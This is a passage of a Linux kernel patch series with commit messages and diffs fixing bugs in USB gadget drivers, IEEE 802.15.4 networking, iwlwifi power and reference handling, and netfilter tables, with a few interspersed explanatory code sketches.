[ 122.362766] ---[ end trace 0673d3467cecf8db ]--- in some cases (reproduction path below). This commit restores the original semantics of that flag and ensures that ffs_closed() is always called when needed, while ffs_closed_callback() is called only if this flag is set. Reproduction path: Compile the kernel without any UDC driver (or bind some gadget to the existing one) and then: $ modprobe g_ffs $ mount none -t functionfs mount_point $ ffs-example mount_point This will fail with -ENODEV as there is no udc. $ ffs-example mount_point This will fail with -EBUSY because ffs_data has not been properly cleaned up.
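In outline, the flag handling after this change works roughly as follows; this is a simplified sketch of the control flow, not the actual f_fs.c code (locking and the ffs_obj lookup are omitted):

	/* Set the flag only once the ready callback has actually succeeded. */
	static int ffs_ready_sketch(struct ffs_data *ffs, struct ffs_dev *ffs_obj)
	{
		int ret = 0;

		if (ffs_obj->ffs_ready_callback) {
			ret = ffs_obj->ffs_ready_callback(ffs);
			if (ret)
				return ret;	/* not ready: flag stays clear */
		}
		set_bit(FFS_FL_CALL_CLOSED_CALLBACK, &ffs->flags);
		return ret;
	}

	/* ffs_closed() itself always runs (e.g. from ffs_data_clear()), but the
	 * user's closed callback fires only if the flag was set. */
	static void ffs_closed_sketch(struct ffs_data *ffs, struct ffs_dev *ffs_obj)
	{
		if (test_and_clear_bit(FFS_FL_CALL_CLOSED_CALLBACK, &ffs->flags) &&
		    ffs_obj->ffs_closed_callback)
			ffs_obj->ffs_closed_callback(ffs);
	}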
Signed-off-by: Krzysztof Opasiak Signed-off-by: Felipe Balbi --- drivers/usb/gadget/function/f_fs.c | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/drivers/usb/gadget/function/f_fs.c b/drivers/usb/gadget/function/f_fs.c index 6bdb57069044..71f68c48103e 100644 --- a/drivers/usb/gadget/function/f_fs.c +++ b/drivers/usb/gadget/function/f_fs.c @@ -315,7 +315,6 @@ static ssize_t ffs_ep0_write(struct file *file, const char __user *buf, return ret; } - set_bit(FFS_FL_CALL_CLOSED_CALLBACK, &ffs->flags); return len; } break; @@ -1463,8 +1462,7 @@ static void ffs_data_clear(struct ffs_data *ffs) { ENTER(); - if (test_and_clear_bit(FFS_FL_CALL_CLOSED_CALLBACK, &ffs->flags)) - ffs_closed(ffs); + ffs_closed(ffs); BUG_ON(ffs->gadget); @@ -3422,9 +3420,13 @@ static int ffs_ready(struct ffs_data *ffs) ffs_obj->desc_ready = true; ffs_obj->ffs_data = ffs; - if (ffs_obj->ffs_ready_callback) + if (ffs_obj->ffs_ready_callback) { ret = ffs_obj->ffs_ready_callback(ffs); + if (ret) + goto done; + } + set_bit(FFS_FL_CALL_CLOSED_CALLBACK, &ffs->flags); done: ffs_dev_unlock(); return ret; @@ -3443,7 +3445,8 @@ static void ffs_closed(struct ffs_data *ffs) ffs_obj->desc_ready = false; - if (ffs_obj->ffs_closed_callback) + if (test_and_clear_bit(FFS_FL_CALL_CLOSED_CALLBACK, &ffs->flags) && + ffs_obj->ffs_closed_callback) ffs_obj->ffs_closed_callback(ffs); if (!ffs_obj->opts || ffs_obj->opts->no_configfs From ca4de53c522f261e84efb659a07435bd1a5a8828 Mon Sep 17 00:00:00 2001 From: Michael Trimarchi Date: Mon, 18 May 2015 17:28:58 +0200 Subject: [PATCH 238/872] usb: gadget: f_uac1: check return code from config_ep_by_speed Not checking config_ep_by_speed could lead to a kernel NULL pointer dereference error in usb_ep_enable Cc: Felipe Balbi Signed-off-by: Michael Trimarchi Signed-off-by: Felipe Balbi --- drivers/usb/gadget/function/f_uac1.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/drivers/usb/gadget/function/f_uac1.c b/drivers/usb/gadget/function/f_uac1.c index 9719abfb6145..7856b3394494 100644 --- a/drivers/usb/gadget/function/f_uac1.c +++ b/drivers/usb/gadget/function/f_uac1.c @@ -588,7 +588,10 @@ static int f_audio_set_alt(struct usb_function *f, unsigned intf, unsigned alt) if (intf == 1) { if (alt == 1) { - config_ep_by_speed(cdev->gadget, f, out_ep); + err = config_ep_by_speed(cdev->gadget, f, out_ep); + if (err) + return err; + usb_ep_enable(out_ep); out_ep->driver_data = audio; audio->copy_buf = f_audio_buffer_alloc(audio_buf_size); From da96cfc133350024ba68ef3289faeb539ee13872 Mon Sep 17 00:00:00 2001 From: Ben Hutchings Date: Sun, 24 May 2015 04:27:32 +0100 Subject: [PATCH 239/872] usb: musb: fix order of conditions for assigning end point operations Currently we always assign one of the two common implementations of ep_offset and ep_select operations, overwriting any platform-specific implementations. Fixes: d026e9c76aac ("usb: musb: Change end point selection to use ...") Signed-off-by: Ben Hutchings Signed-off-by: Felipe Balbi --- drivers/usb/musb/musb_core.c | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/drivers/usb/musb/musb_core.c b/drivers/usb/musb/musb_core.c index 3789b08ef67b..6dca3d794ced 100644 --- a/drivers/usb/musb/musb_core.c +++ b/drivers/usb/musb/musb_core.c @@ -2021,13 +2021,7 @@ musb_init_controller(struct device *dev, int nIrq, void __iomem *ctrl) if (musb->ops->quirks) musb->io.quirks = musb->ops->quirks; - /* At least tusb6010 has it's own offsets.. 
*/ - if (musb->ops->ep_offset) - musb->io.ep_offset = musb->ops->ep_offset; - if (musb->ops->ep_select) - musb->io.ep_select = musb->ops->ep_select; - - /* ..and some devices use indexed offset or flat offset */ + /* Most devices use indexed offset or flat offset */ if (musb->io.quirks & MUSB_INDEXED_EP) { musb->io.ep_offset = musb_indexed_ep_offset; musb->io.ep_select = musb_indexed_ep_select; @@ -2036,6 +2030,12 @@ musb_init_controller(struct device *dev, int nIrq, void __iomem *ctrl) musb->io.ep_select = musb_flat_ep_select; } + /* At least tusb6010 has its own offsets */ + if (musb->ops->ep_offset) + musb->io.ep_offset = musb->ops->ep_offset; + if (musb->ops->ep_select) + musb->io.ep_select = musb->ops->ep_select; + if (musb->ops->fifo_mode) fifo_mode = musb->ops->fifo_mode; else From 342f39a6c8d34d638a87b7d5f2156adc4db2585c Mon Sep 17 00:00:00 2001 From: Rui Miguel Silva Date: Wed, 20 May 2015 14:53:33 +0100 Subject: [PATCH 240/872] usb: gadget: f_fs: fix check in read operation When copying to the iter, the size can be different than the iov count; the check for a full iov is wrong and makes any read request that is not exactly the size of the iov return -EFAULT. So, just check the success of the copy. Signed-off-by: Rui Miguel Silva Signed-off-by: Felipe Balbi --- drivers/usb/gadget/function/f_fs.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/usb/gadget/function/f_fs.c b/drivers/usb/gadget/function/f_fs.c index 71f68c48103e..3507f880eb74 100644 --- a/drivers/usb/gadget/function/f_fs.c +++ b/drivers/usb/gadget/function/f_fs.c @@ -846,7 +846,7 @@ static ssize_t ffs_epfile_io(struct file *file, struct ffs_io_data *io_data) ret = ep->status; if (io_data->read && ret > 0) { ret = copy_to_iter(data, ret, &io_data->data); - if (unlikely(iov_iter_count(&io_data->data))) + if (!ret) ret = -EFAULT; } } From e73d42f15f90614538edeb5d4102f847105f86f2 Mon Sep 17 00:00:00 2001 From: Kazuya Mizuguchi Date: Tue, 26 May 2015 20:13:42 +0900 Subject: [PATCH 241/872] usb: renesas_usbhs: Fix fifo unclear in usbhsf_prepare_pop This patch fixes an issue for control write. When usbhsf_prepare_pop() is called after this driver has called a gadget setup function, this controller doesn't receive the control write data. So, this patch adds code to clear the fifo for control write in usbhsf_prepare_pop().
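A note on the copy_to_iter() check in the f_fs read fix above: copy_to_iter() returns the number of bytes it actually copied, not an error code, and a short copy (user buffer larger than the completed data) is normal for a read. The failure test is therefore a zero return, not leftover space in the iterator. A minimal sketch of that pattern, with illustrative names rather than the driver's own:

	#include <linux/uio.h>
	#include <linux/errno.h>

	/* 'data' holds 'len' bytes of completed request payload; 'iter'
	 * describes the user's buffers, which may be larger than 'len'. */
	static ssize_t copy_result_sketch(void *data, size_t len,
					  struct iov_iter *iter)
	{
		size_t copied = copy_to_iter(data, len, iter);

		/* zero bytes copied means the user memory was unreachable */
		return copied ? copied : -EFAULT;
	}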
Signed-off-by: Kazuya Mizuguchi Signed-off-by: Yoshihiro Shimoda Signed-off-by: Felipe Balbi --- drivers/usb/renesas_usbhs/fifo.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/drivers/usb/renesas_usbhs/fifo.c b/drivers/usb/renesas_usbhs/fifo.c index bc23b4a2c415..0bad84ebe9aa 100644 --- a/drivers/usb/renesas_usbhs/fifo.c +++ b/drivers/usb/renesas_usbhs/fifo.c @@ -611,6 +611,8 @@ struct usbhs_pkt_handle usbhs_fifo_pio_push_handler = { static int usbhsf_prepare_pop(struct usbhs_pkt *pkt, int *is_done) { struct usbhs_pipe *pipe = pkt->pipe; + struct usbhs_priv *priv = usbhs_pipe_to_priv(pipe); + struct usbhs_fifo *fifo = usbhsf_get_cfifo(priv); if (usbhs_pipe_is_busy(pipe)) return 0; @@ -624,6 +626,9 @@ static int usbhsf_prepare_pop(struct usbhs_pkt *pkt, int *is_done) usbhs_pipe_data_sequence(pipe, pkt->sequence); pkt->sequence = -1; /* -1 sequence will be ignored */ + if (usbhs_pipe_is_dcp(pipe)) + usbhsf_fifo_clear(pipe, fifo); + usbhs_pipe_set_trans_count_if_bulk(pipe, pkt->length); usbhs_pipe_enable(pipe); usbhs_pipe_running(pipe, 1); From 93fb9127cb63a3246b32d48fa273010764687862 Mon Sep 17 00:00:00 2001 From: Yoshihiro Shimoda Date: Tue, 26 May 2015 20:13:43 +0900 Subject: [PATCH 242/872] usb: renesas_usbhs: Don't disable the pipe if Control write status stage This patch fixes an issue where this controller is sometimes not able to complete the Control write status stage. This driver should enable DCPCTR.CCPL and PID_BUF to complete the status stage. However, if this driver detects the ctrl_stage interrupt before the control write data is received, it will wrongly clear the PID_BUF in usbhsf_pio_try_pop(). To avoid this issue, this patch doesn't clear the PID_BUF in usbhsf_pio_try_pop(). (Since the previous code also didn't disable the PID_BUF after a control transfer finished, this patch doesn't have any side effects.) Signed-off-by: Yoshihiro Shimoda Signed-off-by: Felipe Balbi --- drivers/usb/renesas_usbhs/fifo.c | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/drivers/usb/renesas_usbhs/fifo.c b/drivers/usb/renesas_usbhs/fifo.c index 0bad84ebe9aa..c0f5c652d272 100644 --- a/drivers/usb/renesas_usbhs/fifo.c +++ b/drivers/usb/renesas_usbhs/fifo.c @@ -678,7 +678,14 @@ static int usbhsf_pio_try_pop(struct usbhs_pkt *pkt, int *is_done) *is_done = 1; usbhsf_rx_irq_ctrl(pipe, 0); usbhs_pipe_running(pipe, 0); - usbhs_pipe_disable(pipe); /* disable pipe first */ + /* + * If function mode, since this controller is possible to enter + * Control Write status stage at this timing, this driver + * should not disable the pipe. If such a case happens, this + * controller is not able to complete the status stage. + */ + if (!usbhs_mod_is_host(priv) && !usbhs_pipe_is_dcp(pipe)) + usbhs_pipe_disable(pipe); /* disable pipe first */ } /* From e34fd879f5516496c7241c9c2caf3a108295a30c Mon Sep 17 00:00:00 2001 From: Lennert Buytenhek Date: Tue, 26 May 2015 15:06:10 +0300 Subject: [PATCH 243/872] mac802154: Avoid rtnl deadlock in mac802154_wpan_ioctl(). ->ndo_do_ioctl() can be entered with the rtnl lock already held, for example when sending a wext ioctl to a device (in which case the rtnl lock is taken by wext_ioctl_dispatch()), but mac802154_wpan_ioctl() currently unconditionally takes the rtnl lock on entry, which can cause deadlocks. To fix this, bail out of mac802154_wpan_ioctl() before taking the rtnl lock if the ioctl cmd is not one of the cmds we implement.
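The deadlock being avoided here is plain lock recursion: the wext core takes the rtnl mutex in wext_ioctl_dispatch() and then calls into ->ndo_do_ioctl(), so an unconditional rtnl_lock() inside the handler blocks on a mutex the same task already holds. The shape of the fix is the usual "reject before locking" pattern, sketched generically below (an illustration, not the mac802154 code itself):

	#include <linux/netdevice.h>
	#include <linux/rtnetlink.h>
	#include <linux/sockios.h>
	#include <linux/errno.h>

	static int wpan_ioctl_sketch(struct net_device *dev, struct ifreq *ifr,
				     int cmd)
	{
		int err = -ENOIOCTLCMD;

		/* Unsupported commands never need the lock; bailing out here
		 * keeps a caller that already holds rtnl from deadlocking. */
		if (cmd != SIOCGIFADDR && cmd != SIOCSIFADDR)
			return err;

		rtnl_lock();
		/* ... handle SIOCGIFADDR / SIOCSIFADDR on 'dev' and 'ifr' ... */
		rtnl_unlock();
		return err;
	}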
Signed-off-by: Lennert Buytenhek Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/mac802154/iface.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/net/mac802154/iface.c b/net/mac802154/iface.c index f30788d2702f..b544b5dc4bfb 100644 --- a/net/mac802154/iface.c +++ b/net/mac802154/iface.c @@ -62,6 +62,9 @@ mac802154_wpan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) (struct sockaddr_ieee802154 *)&ifr->ifr_addr; int err = -ENOIOCTLCMD; + if (cmd != SIOCGIFADDR && cmd != SIOCSIFADDR) + return err; + rtnl_lock(); switch (cmd) { From c032705ebfed32a6dcda72d83c54f060d4bf1e6e Mon Sep 17 00:00:00 2001 From: Lennert Buytenhek Date: Mon, 25 May 2015 15:38:24 +0300 Subject: [PATCH 244/872] ieee802154 socket: Return EMSGSIZE from raw_sendmsg() if packet too big. The proper return code for trying to send a packet that exceeds the outgoing interface's MTU is EMSGSIZE, not EINVAL, so patch ieee802154's raw_sendmsg() to do the right thing. (Its dgram_sendmsg() was already returning EMSGSIZE for this case.) Signed-off-by: Lennert Buytenhek Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/ieee802154/socket.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/ieee802154/socket.c b/net/ieee802154/socket.c index e5cc2537c2a3..d9fc5ccb1d0d 100644 --- a/net/ieee802154/socket.c +++ b/net/ieee802154/socket.c @@ -284,7 +284,7 @@ static int raw_sendmsg(struct sock *sk, struct msghdr *msg, size_t size) if (size > mtu) { pr_debug("size = %Zu, mtu = %u\n", size, mtu); - err = -EINVAL; + err = -EMSGSIZE; goto out_dev; } From a61408e9a48e7634984408e334b125a72726440e Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Mon, 27 Apr 2015 21:38:10 +0300 Subject: [PATCH 245/872] iwlwifi: pcie: don't call set_pwr functions for family 8000 We should not call the iwl_pcie_set_pwr() functions in the suspend/resume flows for family 8000, because the register used is locked in devices from this family. Doing this causes an NMI protection error (RT_NMI_INTERRUPT_PREG_PROTECTION). To fix this, skip those calls if the device family is IWL_DEVICE_FAMILY_8000. Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/pcie/trans.c | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/pcie/trans.c b/drivers/net/wireless/iwlwifi/pcie/trans.c index 8e5be8d6f4a8..d8943384107e 100644 --- a/drivers/net/wireless/iwlwifi/pcie/trans.c +++ b/drivers/net/wireless/iwlwifi/pcie/trans.c @@ -1164,7 +1164,8 @@ static void iwl_trans_pcie_d3_suspend(struct iwl_trans *trans, bool test) */ iwl_trans_pcie_tx_reset(trans); - iwl_pcie_set_pwr(trans, true); + if (trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) + iwl_pcie_set_pwr(trans, true); } static int iwl_trans_pcie_d3_resume(struct iwl_trans *trans, @@ -1202,7 +1203,8 @@ static int iwl_trans_pcie_d3_resume(struct iwl_trans *trans, return ret; } - iwl_pcie_set_pwr(trans, false); + if (trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) + iwl_pcie_set_pwr(trans, false); iwl_trans_pcie_tx_reset(trans); From c779273b37bec14c33feeab11c4d457a24bc64e0 Mon Sep 17 00:00:00 2001 From: Eliad Peller Date: Sun, 19 Apr 2015 11:41:04 +0300 Subject: [PATCH 246/872] iwlwifi: mvm: fix ROC reference accounting commit b112889c5af8124 ("iwlwifi: mvm: add Aux ROC request/response flow") added aux ROC flow in addition to the existing ROC flow. 
While doing it, it moved the ROC reference release to a common work item, which is being called for both the ROC and aux ROC flows. This resulted in invalid reference accounting, as no reference was taken in case of aux ROC, while a reference was released on completion. Fix it by adding a reference for the aux ROC as well, and release only the relevant references on completion (according to the set bits). While at it, convert cancel_work_sync() to flush_work(), in order to make sure the references are being cleaned properly. Fixes: b112889c5af8 ("iwlwifi: mvm: add Aux ROC request/response flow") Signed-off-by: Eliad Peller Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/debugfs.c | 5 +++-- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 2 +- drivers/net/wireless/iwlwifi/mvm/mvm.h | 1 + drivers/net/wireless/iwlwifi/mvm/time-event.c | 15 +++++++++------ 4 files changed, 14 insertions(+), 9 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/debugfs.c b/drivers/net/wireless/iwlwifi/mvm/debugfs.c index 9ac04c1ea706..8c17b943cc6f 100644 --- a/drivers/net/wireless/iwlwifi/mvm/debugfs.c +++ b/drivers/net/wireless/iwlwifi/mvm/debugfs.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -1356,6 +1356,7 @@ static ssize_t iwl_dbgfs_d0i3_refs_read(struct file *file, PRINT_MVM_REF(IWL_MVM_REF_UCODE_DOWN); PRINT_MVM_REF(IWL_MVM_REF_SCAN); PRINT_MVM_REF(IWL_MVM_REF_ROC); + PRINT_MVM_REF(IWL_MVM_REF_ROC_AUX); PRINT_MVM_REF(IWL_MVM_REF_P2P_CLIENT); PRINT_MVM_REF(IWL_MVM_REF_AP_IBSS); PRINT_MVM_REF(IWL_MVM_REF_USER); diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index c131ce6d168a..ccbe5757dd26 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -1410,7 +1410,7 @@ void __iwl_mvm_mac_stop(struct iwl_mvm *mvm) * The work item could be running or queued if the * ROC time event stops just as we get here. */ - cancel_work_sync(&mvm->roc_done_wk); + flush_work(&mvm->roc_done_wk); iwl_trans_stop_device(mvm->trans); diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index 6d332348dca6..dde83efd1a6c 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -276,6 +276,7 @@ enum iwl_mvm_ref_type { IWL_MVM_REF_UCODE_DOWN, IWL_MVM_REF_SCAN, IWL_MVM_REF_ROC, + IWL_MVM_REF_ROC_AUX, IWL_MVM_REF_P2P_CLIENT, IWL_MVM_REF_AP_IBSS, IWL_MVM_REF_USER, diff --git a/drivers/net/wireless/iwlwifi/mvm/time-event.c b/drivers/net/wireless/iwlwifi/mvm/time-event.c index fd7b0d36f9a6..a7448cf01688 100644 --- a/drivers/net/wireless/iwlwifi/mvm/time-event.c +++ b/drivers/net/wireless/iwlwifi/mvm/time-event.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. 
- * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -108,12 +108,14 @@ void iwl_mvm_roc_done_wk(struct work_struct *wk) * in the case that the time event actually completed in the firmware * (which is handled in iwl_mvm_te_handle_notif). */ - if (test_and_clear_bit(IWL_MVM_STATUS_ROC_RUNNING, &mvm->status)) + if (test_and_clear_bit(IWL_MVM_STATUS_ROC_RUNNING, &mvm->status)) { queues |= BIT(IWL_MVM_OFFCHANNEL_QUEUE); - if (test_and_clear_bit(IWL_MVM_STATUS_ROC_AUX_RUNNING, &mvm->status)) + iwl_mvm_unref(mvm, IWL_MVM_REF_ROC); + } + if (test_and_clear_bit(IWL_MVM_STATUS_ROC_AUX_RUNNING, &mvm->status)) { queues |= BIT(mvm->aux_queue); - - iwl_mvm_unref(mvm, IWL_MVM_REF_ROC); + iwl_mvm_unref(mvm, IWL_MVM_REF_ROC_AUX); + } synchronize_net(); @@ -393,6 +395,7 @@ static int iwl_mvm_aux_roc_te_handle_notif(struct iwl_mvm *mvm, } else if (le32_to_cpu(notif->action) == TE_V2_NOTIF_HOST_EVENT_START) { set_bit(IWL_MVM_STATUS_ROC_AUX_RUNNING, &mvm->status); te_data->running = true; + iwl_mvm_ref(mvm, IWL_MVM_REF_ROC_AUX); ieee80211_ready_on_channel(mvm->hw); /* Start TE */ } else { IWL_DEBUG_TE(mvm, From 2f06550b3b0e26f54045337e34ec2a1b666bb6c6 Mon Sep 17 00:00:00 2001 From: Florian Westphal Date: Sun, 24 May 2015 01:00:41 +0200 Subject: [PATCH 247/872] netfilter: remove unused comefrom hookmask argument Signed-off-by: Florian Westphal Signed-off-by: Pablo Neira Ayuso --- net/ipv4/netfilter/ip_tables.c | 4 +--- net/ipv6/netfilter/ip6_tables.c | 4 +--- 2 files changed, 2 insertions(+), 6 deletions(-) diff --git a/net/ipv4/netfilter/ip_tables.c b/net/ipv4/netfilter/ip_tables.c index c69db7fa25ee..583779fc3425 100644 --- a/net/ipv4/netfilter/ip_tables.c +++ b/net/ipv4/netfilter/ip_tables.c @@ -1441,7 +1441,6 @@ static int compat_find_calc_match(struct xt_entry_match *m, const char *name, const struct ipt_ip *ip, - unsigned int hookmask, int *size) { struct xt_match *match; @@ -1510,8 +1509,7 @@ check_compat_entry_size_and_hooks(struct compat_ipt_entry *e, entry_offset = (void *)e - (void *)base; j = 0; xt_ematch_foreach(ematch, e) { - ret = compat_find_calc_match(ematch, name, - &e->ip, e->comefrom, &off); + ret = compat_find_calc_match(ematch, name, &e->ip, &off); if (ret != 0) goto release_matches; ++j; diff --git a/net/ipv6/netfilter/ip6_tables.c b/net/ipv6/netfilter/ip6_tables.c index 1a732a1d3c8e..d54f04970ee0 100644 --- a/net/ipv6/netfilter/ip6_tables.c +++ b/net/ipv6/netfilter/ip6_tables.c @@ -1456,7 +1456,6 @@ static int compat_find_calc_match(struct xt_entry_match *m, const char *name, const struct ip6t_ip6 *ipv6, - unsigned int hookmask, int *size) { struct xt_match *match; @@ -1525,8 +1524,7 @@ check_compat_entry_size_and_hooks(struct compat_ip6t_entry *e, entry_offset = (void *)e - (void *)base; j = 0; xt_ematch_foreach(ematch, e) { - ret = compat_find_calc_match(ematch, name, - &e->ipv6, e->comefrom, &off); + ret = compat_find_calc_match(ematch, name, &e->ipv6, &off); if (ret != 0) goto release_matches; ++j; From 529985de202276d0d3455d16d284d72efc357d98 Mon Sep 17 
00:00:00 2001 From: Pablo Neira Ayuso Date: Tue, 26 May 2015 18:41:12 +0200 Subject: [PATCH 248/872] netfilter: default CONFIG_NETFILTER_INGRESS to y Useful to compile-test all options. Suggested-by: Alexei Stavoroitov Signed-off-by: Pablo Neira Ayuso --- net/netfilter/Kconfig | 1 + 1 file changed, 1 insertion(+) diff --git a/net/netfilter/Kconfig b/net/netfilter/Kconfig index db1c674397ad..9a89e7c67d78 100644 --- a/net/netfilter/Kconfig +++ b/net/netfilter/Kconfig @@ -3,6 +3,7 @@ menu "Core Netfilter Configuration" config NETFILTER_INGRESS bool "Netfilter ingress support" + default y select NET_INGRESS help This allows you to classify packets from ingress using the Netfilter From ebddf1a8d78aa3436353fae75c4396e50cb2d6cf Mon Sep 17 00:00:00 2001 From: Pablo Neira Ayuso Date: Tue, 26 May 2015 18:41:20 +0200 Subject: [PATCH 249/872] netfilter: nf_tables: allow to bind table to net_device This patch adds the internal NFT_AF_NEEDS_DEV flag to indicate that you must attach this table to a net_device. This change is required by the follow up patch that introduces the new netdev table. Signed-off-by: Pablo Neira Ayuso --- include/net/netfilter/nf_tables.h | 8 +++++ include/uapi/linux/netfilter/nf_tables.h | 2 ++ net/netfilter/nf_tables_api.c | 46 +++++++++++++++++++++--- 3 files changed, 51 insertions(+), 5 deletions(-) diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h index e6bcf55dcf20..3d6f48ca40a7 100644 --- a/include/net/netfilter/nf_tables.h +++ b/include/net/netfilter/nf_tables.h @@ -819,6 +819,7 @@ unsigned int nft_do_chain(struct nft_pktinfo *pkt, * @use: number of chain references to this table * @flags: table flag (see enum nft_table_flags) * @name: name of the table + * @dev: this table is bound to this device (if any) */ struct nft_table { struct list_head list; @@ -828,6 +829,11 @@ struct nft_table { u32 use; u16 flags; char name[NFT_TABLE_MAXNAMELEN]; + struct net_device *dev; +}; + +enum nft_af_flags { + NFT_AF_NEEDS_DEV = (1 << 0), }; /** @@ -838,6 +844,7 @@ struct nft_table { * @nhooks: number of hooks in this family * @owner: module owner * @tables: used internally + * @flags: family flags * @nops: number of hook ops in this family * @hook_ops_init: initialization function for chain hook ops * @hooks: hookfn overrides for packet validation @@ -848,6 +855,7 @@ struct nft_af_info { unsigned int nhooks; struct module *owner; struct list_head tables; + u32 flags; unsigned int nops; void (*hook_ops_init)(struct nf_hook_ops *, unsigned int); diff --git a/include/uapi/linux/netfilter/nf_tables.h b/include/uapi/linux/netfilter/nf_tables.h index 5fa1cd04762e..89a671e0f5e7 100644 --- a/include/uapi/linux/netfilter/nf_tables.h +++ b/include/uapi/linux/netfilter/nf_tables.h @@ -146,12 +146,14 @@ enum nft_table_flags { * @NFTA_TABLE_NAME: name of the table (NLA_STRING) * @NFTA_TABLE_FLAGS: bitmask of enum nft_table_flags (NLA_U32) * @NFTA_TABLE_USE: number of chains in this table (NLA_U32) + * @NFTA_TABLE_DEV: net device name (NLA_STRING) */ enum nft_table_attributes { NFTA_TABLE_UNSPEC, NFTA_TABLE_NAME, NFTA_TABLE_FLAGS, NFTA_TABLE_USE, + NFTA_TABLE_DEV, __NFTA_TABLE_MAX }; #define NFTA_TABLE_MAX (__NFTA_TABLE_MAX - 1) diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c index ad9d11fb29fd..2fd4e99dd074 100644 --- a/net/netfilter/nf_tables_api.c +++ b/net/netfilter/nf_tables_api.c @@ -399,6 +399,8 @@ static const struct nla_policy nft_table_policy[NFTA_TABLE_MAX + 1] = { [NFTA_TABLE_NAME] = { .type = NLA_STRING, .len = 
NFT_TABLE_MAXNAMELEN - 1 }, [NFTA_TABLE_FLAGS] = { .type = NLA_U32 }, + [NFTA_TABLE_DEV] = { .type = NLA_STRING, + .len = IFNAMSIZ - 1 }, }; static int nf_tables_fill_table_info(struct sk_buff *skb, struct net *net, @@ -423,6 +425,10 @@ static int nf_tables_fill_table_info(struct sk_buff *skb, struct net *net, nla_put_be32(skb, NFTA_TABLE_USE, htonl(table->use))) goto nla_put_failure; + if (table->dev && + nla_put_string(skb, NFTA_TABLE_DEV, table->dev->name)) + goto nla_put_failure; + nlmsg_end(skb, nlh); return 0; @@ -608,6 +614,11 @@ static int nf_tables_updtable(struct nft_ctx *ctx) if (flags == ctx->table->flags) return 0; + if ((ctx->afi->flags & NFT_AF_NEEDS_DEV) && + ctx->nla[NFTA_TABLE_DEV] && + nla_strcmp(ctx->nla[NFTA_TABLE_DEV], ctx->table->dev->name)) + return -EOPNOTSUPP; + trans = nft_trans_alloc(ctx, NFT_MSG_NEWTABLE, sizeof(struct nft_trans_table)); if (trans == NULL) @@ -645,6 +656,7 @@ static int nf_tables_newtable(struct sock *nlsk, struct sk_buff *skb, struct nft_table *table; struct net *net = sock_net(skb->sk); int family = nfmsg->nfgen_family; + struct net_device *dev = NULL; u32 flags = 0; struct nft_ctx ctx; int err; @@ -679,30 +691,50 @@ static int nf_tables_newtable(struct sock *nlsk, struct sk_buff *skb, return -EINVAL; } + if (afi->flags & NFT_AF_NEEDS_DEV) { + char ifname[IFNAMSIZ]; + + if (!nla[NFTA_TABLE_DEV]) + return -EOPNOTSUPP; + + nla_strlcpy(ifname, nla[NFTA_TABLE_DEV], IFNAMSIZ); + dev = dev_get_by_name(net, ifname); + if (!dev) + return -ENOENT; + } else if (nla[NFTA_TABLE_DEV]) { + return -EOPNOTSUPP; + } + + err = -EAFNOSUPPORT; if (!try_module_get(afi->owner)) - return -EAFNOSUPPORT; + goto err1; err = -ENOMEM; table = kzalloc(sizeof(*table), GFP_KERNEL); if (table == NULL) - goto err1; + goto err2; nla_strlcpy(table->name, name, NFT_TABLE_MAXNAMELEN); INIT_LIST_HEAD(&table->chains); INIT_LIST_HEAD(&table->sets); table->flags = flags; + table->dev = dev; nft_ctx_init(&ctx, skb, nlh, afi, table, NULL, nla); err = nft_trans_table_add(&ctx, NFT_MSG_NEWTABLE); if (err < 0) - goto err2; + goto err3; 